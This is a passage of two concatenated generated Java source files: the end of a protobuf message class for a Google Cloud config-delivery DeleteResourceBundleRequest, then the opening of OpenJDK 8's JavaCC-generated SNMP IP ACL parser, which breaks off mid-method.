com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * Message for deleting a ResourceBundle * </pre> * * Protobuf type {@code google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequestOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.class, com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.Builder.class); } // Construct using // com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; name_ = ""; requestId_ = ""; force_ = false; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.configdelivery.v1beta.ConfigDeliveryProto .internal_static_google_cloud_configdelivery_v1beta_DeleteResourceBundleRequest_descriptor; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstanceForType() { return com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest .getDefaultInstance(); } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest build() { com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest buildPartial() { com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result = new com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest(this); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartial0( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest result) { int from_bitField0_ = bitField0_; if (((from_bitField0_ & 0x00000001) != 0)) { result.name_ = name_; } if (((from_bitField0_ & 0x00000002) != 0)) { result.requestId_ = requestId_; } if (((from_bitField0_ & 0x00000004) != 0)) { result.force_ = force_; } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) { return mergeFrom( (com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest other) { if (other == com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest .getDefaultInstance()) return this; if (!other.getName().isEmpty()) { name_ = other.name_; bitField0_ |= 0x00000001; onChanged(); } if (!other.getRequestId().isEmpty()) { requestId_ = other.requestId_; bitField0_ |= 0x00000002; onChanged(); } if (other.getForce() != false) { setForce(other.getForce()); } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { name_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000001; break; } // case 10 case 18: { requestId_ = input.readStringRequireUtf8(); bitField0_ |= 0x00000002; break; } // case 18 case 24: { force_ = input.readBool(); bitField0_ |= 0x00000004; break; } // case 24 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.lang.Object name_ = ""; /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The name. */ public java.lang.String getName() { java.lang.Object ref = name_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); name_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return The bytes for name. */ public com.google.protobuf.ByteString getNameBytes() { java.lang.Object ref = name_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); name_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The name to set. * @return This builder for chaining. */ public Builder setName(java.lang.String value) { if (value == null) { throw new NullPointerException(); } name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearName() { name_ = getDefaultInstance().getName(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); return this; } /** * * * <pre> * Required. Name of the resource * </pre> * * <code> * string name = 1 [(.google.api.field_behavior) = REQUIRED, (.google.api.resource_reference) = { ... } * </code> * * @param value The bytes for name to set. * @return This builder for chaining. */ public Builder setNameBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); name_ = value; bitField0_ |= 0x00000001; onChanged(); return this; } private java.lang.Object requestId_ = ""; /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The requestId. */ public java.lang.String getRequestId() { java.lang.Object ref = requestId_; if (!(ref instanceof java.lang.String)) { com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; java.lang.String s = bs.toStringUtf8(); requestId_ = s; return s; } else { return (java.lang.String) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return The bytes for requestId. */ public com.google.protobuf.ByteString getRequestIdBytes() { java.lang.Object ref = requestId_; if (ref instanceof String) { com.google.protobuf.ByteString b = com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); requestId_ = b; return b; } else { return (com.google.protobuf.ByteString) ref; } } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @param value The requestId to set. * @return This builder for chaining. */ public Builder setRequestId(java.lang.String value) { if (value == null) { throw new NullPointerException(); } requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @return This builder for chaining. */ public Builder clearRequestId() { requestId_ = getDefaultInstance().getRequestId(); bitField0_ = (bitField0_ & ~0x00000002); onChanged(); return this; } /** * * * <pre> * Optional. An optional request ID to identify requests. Specify a unique * request ID so that if you must retry your request, the server will know to * ignore the request if it has already been completed. The server will * guarantee that for at least 60 minutes after the first request. * * For example, consider a situation where you make an initial request and the * request times out. If you make the request again with the same request * ID, the server can check if original operation with the same request ID * was received, and if so, will ignore the second request. This prevents * clients from accidentally creating duplicate commitments. * * The request ID must be a valid UUID with the exception that zero UUID is * not supported (00000000-0000-0000-0000-000000000000). * </pre> * * <code> * string request_id = 2 [(.google.api.field_behavior) = OPTIONAL, (.google.api.field_info) = { ... } * </code> * * @param value The bytes for requestId to set. * @return This builder for chaining. */ public Builder setRequestIdBytes(com.google.protobuf.ByteString value) { if (value == null) { throw new NullPointerException(); } checkByteStringIsUtf8(value); requestId_ = value; bitField0_ |= 0x00000002; onChanged(); return this; } private boolean force_; /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return The force. */ @java.lang.Override public boolean getForce() { return force_; } /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @param value The force to set. * @return This builder for chaining. */ public Builder setForce(boolean value) { force_ = value; bitField0_ |= 0x00000004; onChanged(); return this; } /** * * * <pre> * Optional. If set to true, any releases of this resource bundle will also be * deleted. (Otherwise, the request will only work if the resource bundle has * no releases.) * </pre> * * <code>bool force = 3 [(.google.api.field_behavior) = OPTIONAL];</code> * * @return This builder for chaining. */ public Builder clearForce() { bitField0_ = (bitField0_ & ~0x00000004); force_ = false; onChanged(); return this; } @java.lang.Override public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) } // @@protoc_insertion_point(class_scope:google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest) private static final com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest(); } public static com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<DeleteResourceBundleRequest> PARSER = new com.google.protobuf.AbstractParser<DeleteResourceBundleRequest>() { @java.lang.Override public DeleteResourceBundleRequest parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<DeleteResourceBundleRequest> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<DeleteResourceBundleRequest> getParserForType() { return PARSER; } @java.lang.Override public com.google.cloud.configdelivery.v1beta.DeleteResourceBundleRequest getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
openjdk/jdk8
35,677
jdk/src/share/classes/com/sun/jmx/snmp/IPAcl/Parser.java
/* * Copyright (c) 1997, 2012, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ /* Generated By:JJTree&JavaCC: Do not edit this line. Parser.java */ package com.sun.jmx.snmp.IPAcl; import java.io.*; @SuppressWarnings("unchecked") // generated code, not worth fixing class Parser/*@bgen(jjtree)*/implements ParserTreeConstants, ParserConstants {/*@bgen(jjtree)*/ protected JJTParserState jjtree = new JJTParserState(); // A file can contain several acl definitions // final public JDMSecurityDefs SecurityDefs() throws ParseException { /*@bgen(jjtree) SecurityDefs */ JDMSecurityDefs jjtn000 = new JDMSecurityDefs(JJTSECURITYDEFS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case ACL: AclBlock(); break; default: jj_la1[0] = jj_gen; ; } switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case TRAP: TrapBlock(); break; default: jj_la1[1] = jj_gen; ; } switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case INFORM: InformBlock(); break; default: jj_la1[2] = jj_gen; ; } jj_consume_token(0); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void AclBlock() throws ParseException { /*@bgen(jjtree) AclBlock */ JDMAclBlock jjtn000 = new JDMAclBlock(JJTACLBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(ACL); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_1: while (true) { AclItem(); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[3] = jj_gen; break label_1; } } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void AclItem() throws ParseException { /*@bgen(jjtree) AclItem */ JDMAclItem jjtn000 = new JDMAclItem(JJTACLITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.com = Communities(); jjtn000.access = Access(); Managers(); jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMCommunities Communities() throws ParseException { /*@bgen(jjtree) Communities */ JDMCommunities jjtn000 = new JDMCommunities(JJTCOMMUNITIES); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(COMMUNITIES); jj_consume_token(ASSIGN); Community(); label_2: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[4] = jj_gen; break label_2; } jj_consume_token(COMMA); Community(); } jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void Community() throws ParseException { /*@bgen(jjtree) Community */ JDMCommunity jjtn000 = new JDMCommunity(JJTCOMMUNITY); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(IDENTIFIER); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.communityString= t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMAccess Access() throws ParseException { /*@bgen(jjtree) Access */ JDMAccess jjtn000 = new JDMAccess(JJTACCESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(ACCESS); jj_consume_token(ASSIGN); switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case RO: jj_consume_token(RO); jjtn000.access= RO; break; case RW: jj_consume_token(RW); jjtn000.access= RW; break; default: jj_la1[5] = jj_gen; jj_consume_token(-1); throw new ParseException(); } jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; {if (true) return jjtn000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } throw new Error("Missing return statement in function"); } final public void Managers() throws ParseException { /*@bgen(jjtree) Managers */ JDMManagers jjtn000 = new JDMManagers(JJTMANAGERS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(MANAGERS); jj_consume_token(ASSIGN); Host(); label_3: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case COMMA: ; break; default: jj_la1[6] = jj_gen; break label_3; } jj_consume_token(COMMA); Host(); } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void Host() throws ParseException { /*@bgen(jjtree) Host */ JDMHost jjtn000 = new JDMHost(JJTHOST); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case IDENTIFIER: HostName(); break; default: jj_la1[7] = jj_gen; if (jj_2_1(2147483647)) { NetMask(); } else if (jj_2_2(2147483647)) { NetMaskV6(); } else if (jj_2_3(2147483647)) { IpAddress(); } else { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case V6_ADDRESS: IpV6Address(); break; case INTEGER_LITERAL: IpMask(); break; default: jj_la1[8] = jj_gen; jj_consume_token(-1); throw new ParseException(); } } } } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void HostName() throws ParseException { /*@bgen(jjtree) HostName */ JDMHostName jjtn000 = new JDMHostName(JJTHOSTNAME); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(IDENTIFIER); jjtn000.name.append(t.image); label_4: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[9] = jj_gen; break label_4; } jj_consume_token(DOT); t = jj_consume_token(IDENTIFIER); jjtn000.name.append( "." + t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpAddress() throws ParseException { /*@bgen(jjtree) IpAddress */ JDMIpAddress jjtn000 = new JDMIpAddress(JJTIPADDRESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_5: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[10] = jj_gen; break label_5; } jj_consume_token(DOT); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." + t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpV6Address() throws ParseException { /*@bgen(jjtree) IpV6Address */ JDMIpV6Address jjtn000 = new JDMIpV6Address(JJTIPV6ADDRESS); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(V6_ADDRESS); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.address.append(t.image); } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void IpMask() throws ParseException { /*@bgen(jjtree) IpMask */ JDMIpMask jjtn000 = new JDMIpMask(JJTIPMASK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_6: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case MARK: ; break; default: jj_la1[11] = jj_gen; break label_6; } jj_consume_token(MARK); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." + t.image); } } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void NetMask() throws ParseException { /*@bgen(jjtree) NetMask */ JDMNetMask jjtn000 = new JDMNetMask(JJTNETMASK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append(t.image); label_7: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case DOT: ; break; default: jj_la1[12] = jj_gen; break label_7; } jj_consume_token(DOT); t = jj_consume_token(INTEGER_LITERAL); jjtn000.address.append( "." + t.image); } jj_consume_token(MASK); t = jj_consume_token(INTEGER_LITERAL); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.mask = t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void NetMaskV6() throws ParseException { /*@bgen(jjtree) NetMaskV6 */ JDMNetMaskV6 jjtn000 = new JDMNetMaskV6(JJTNETMASKV6); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000);Token t; try { t = jj_consume_token(V6_ADDRESS); jjtn000.address.append(t.image); jj_consume_token(MASK); t = jj_consume_token(INTEGER_LITERAL); jjtree.closeNodeScope(jjtn000, true); jjtc000 = false; jjtn000.mask = t.image; } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapBlock() throws ParseException { /*@bgen(jjtree) TrapBlock */ JDMTrapBlock jjtn000 = new JDMTrapBlock(JJTTRAPBLOCK); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(TRAP); jj_consume_token(ASSIGN); jj_consume_token(LBRACE); label_8: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[13] = jj_gen; break label_8; } TrapItem(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public void TrapItem() throws ParseException { /*@bgen(jjtree) TrapItem */ JDMTrapItem jjtn000 = new JDMTrapItem(JJTTRAPITEM); boolean jjtc000 = true; jjtree.openNodeScope(jjtn000); try { jj_consume_token(LBRACE); jjtn000.comm = TrapCommunity(); TrapInterestedHost(); label_9: while (true) { switch ((jj_ntk==-1)?jj_ntk():jj_ntk) { case LBRACE: ; break; default: jj_la1[14] = jj_gen; break label_9; } Enterprise(); } jj_consume_token(RBRACE); } catch (Throwable jjte000) { if (jjtc000) { jjtree.clearNodeScope(jjtn000); jjtc000 = false; } else { jjtree.popNode(); } if (jjte000 instanceof RuntimeException) { {if (true) throw (RuntimeException)jjte000;} } if (jjte000 instanceof ParseException) { {if (true) throw (ParseException)jjte000;} } {if (true) throw (Error)jjte000;} } finally { if (jjtc000) { jjtree.closeNodeScope(jjtn000, true); } } } final public JDMTrapCommunity TrapCommunity() throws 